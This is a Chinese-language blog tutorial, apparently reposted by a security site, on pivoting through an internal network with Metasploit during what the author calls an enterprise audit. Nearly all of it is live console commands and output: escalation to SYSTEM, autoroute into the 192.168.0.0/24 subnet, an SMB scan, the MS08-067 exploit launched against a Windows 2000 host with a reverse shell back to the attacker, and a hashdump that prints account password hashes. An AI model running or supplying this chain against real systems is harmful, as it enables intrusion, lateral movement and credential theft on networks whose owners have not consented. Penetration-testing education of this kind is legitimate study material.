metasploit的pivot实例详解

前言:给某企业做审计,整体的网络架构很牛逼,整个企业的网络架构光设计估计要NNN万,对用户权限的审计也做的很严格,waf的规则也写的很好,于是,偶遇了 一个mysql的小小的用户,但是通过DNS解析来连接的,并且划分了vlan,在web页面执行waf直接给拦截了,百撕不得骑姐啊,后来通过msf的 meterpter创建的session里面创建Pivot,然后添加路由,在console里面执行mysql操作,终于得以顺利的XXOO,百密必有 一疏,msf的pivoit功能在做内网审计的时候确实很好用啊

first,不管怎么样,各种方式,首先获得一个shell,system权限的shell,建立meterpter的session
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeRemoteShutdownPrivilege
SeUndockPrivilege
SeManageVolumePrivilege

meterpreter > getsystem
…got system (via technique 1).

然后看下本地的ip神马的

meterpreter > ipconfig /all

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface 65539
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:cd:69:e8
MTU          : 1500
IPv4 Address : 192.168.0.116
IPv4 Netmask : 255.255.255.0

然后获取本地网络分配情况

meterpreter > run get_local_subnets
Local subnet: 192.168.0.0/255.255.255.0

ok,咱们开始添加本地网关和ip地址,在session里面创建虚拟路由功能

meterpreter > run autoroute -h
Get a list of local subnets based on the host’s routes
USAGE: run get_local_subnets

OPTIONS:

-D        Delete all routes (does not require a subnet)
-d        Delete the named route instead of adding it
-h        Help and usage
-n <opt>  Netmask (IPv4, for example, 255.255.255.0
-p        Print active routing table. All other options are ignored
-s <opt>  Subnet (IPv4, for example, 10.10.10.0)

不多解释,大家都能看懂,我们开始添加IP地址和子网掩码

meterpreter > run autoroute -s 192.168.0.0/24
[*] Adding a route to 192.168.0.0/255.255.255.0…
[+] Added route to 192.168.0.0/255.255.255.0 via xxx.24y.x7.50
[*] Use the -p option to list all active routes

自动分配IP,然后查看一下分配的IP情况

meterpreter > run autoroute -p

Active Routing Table
====================

Subnet             Netmask            Gateway
——             ——-            ——-
192.168.0.0        255.255.255.0      Session 1

创建 成功,当前session成功创建虚拟路由客户端,后台运行当前session

meterpreter >
Background session 1? [y/N]

扫描当前目标网络的机器smb信息,借此来判断开放smb信息机器的一些信息

msf  auxiliary(smb_version) > run

[*] Scanned 029 of 256 hosts (011% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 079 of 256 hosts (030% complete)
[*] 192.168.0.101:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:AV-PC) (domain:AV-PC)
[*] 192.168.0.100:445 is running Windows 7 Ultimate 7601 Service Pack (Build 1) (language: Unknown) (name:USERCHI-4JSMNL8) (domain:WORKGROUP)
[*] Scanned 103 of 256 hosts (040% complete)
[*] 192.168.0.116:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:MILSEC) (domain:WORKGROUP)
[*] 192.168.0.127:445 is running Windows 2003 Service Pack 2 (language: Unknown) (name:MILSEC) (domain:WORKGROUP)
[*] 192.168.0.128:445 is running Windows 2000 Service Pack 4 with MS05-010+ (language: Chinese – Traditional) (name:J86PG7C8XQQPZDD) (domain:雨薇在线)
[*] Scanned 128 of 256 hosts (050% complete)
[*] Scanned 154 of 256 hosts (060% complete)
[*] Scanned 180 of 256 hosts (070% complete)
[*] Scanned 205 of 256 hosts (080% complete)
[*] Scanned 231 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

人品爆发了,内网有一台Windows 2000server的机器,试试08067,估计杀他还是没问题的

msf  exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set LHOST 192.168.0.0
LHOST => 192.168.0.0
msf  exploit(ms08_067_netapi) > set LPORT 9988
LPORT => 9988
msf  exploit(ms08_067_netapi) > set RHOST 192.168.0.128
RHOST => 192.168.0.128
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on xx.xy.xxy.131:9988
[*] Automatically detecting the target…
[*] Fingerprint: Windows 2000 – Service Pack 4 with MS05-010+ – lang:Chinese – Traditional
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability…
[*] Sending stage (752128 bytes) to yyy.yxy.xyx.154
[*] Meterpreter session 2 opened (xx.xy.xxy.131:9988 -> yyy.yxy.xyx.154:33303) at Sat Mar 24 00:42:30 +0400 2012

meterpreter >

连踩两次狗屎,可以去买彩票了。溢出成功,现在看看ip神马的

meterpreter > ipconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1500
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0

Interface 16777219
============
Name         : AMD PCNET Family Ethernet Adapter
Hardware MAC : 00:0c:29:5f:c6:cd
MTU          : 1500
IPv4 Address : 192.168.0.128
IPv4 Netmask : 255.255.255.0

没错,的确是我们的目标机器的内网机器,跟上面的IP是有所不同的吧,

抓hash啊,亲,

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_J86PG7C8XQQPZDD:1001:f1e39dbd0be340d11146fdf88178ba65:be3c0db67905a8e99a381dd109586c17:::
IWAM_J86PG7C8XQQPZDD:1002:2cc6fe6448db8c5f60b62c4796bb3088:2ea4c2826f40da7d5e7d67f001aae9d0:::
TsInternetUser:1000:2d705216336fe3b01ff234d2818fa846:0d834ee5cfa4b88ac3978002e3acadec:::

后台运行看一下

meterpreter >
Background session 2? [y/N]
msf  exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id  Type                   Information                            Connection
–  —-                   ———–                            ———-
1   meterpreter x86/win32  MILSEC\Administrator @ MILSEC          xx.xy.xxy.131:5546 -> xxx.24y.57.50:30310 (192.168.0.116)
2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ J86PG7C8XQQPZDD  xx.xy.xxy.131:9988 -> xxx.24x.148.154:33303 (192.168.0.128)

msf  exploit(ms08_067_netapi) >
亲,两个不同的内网IP和不同的外网IP哦,证明是两台不同的机器通过同一个pivot环境来溢出的,

linux 下面的这个是需要root权限来执行的,不然autoroute是会出问题的,Linux的明天再扯,希望这个对大家做内网审计的时候能有一些帮助……

喜欢metasploit的还可以看看:《msf 之 webshell 提权

links:http://hi.baidu.com/p3rlish/blog/item/d117a7f3a8b3384f352acc08.html

网络安全攻防研究室(www.91ri.org)信息安全小组收集整理。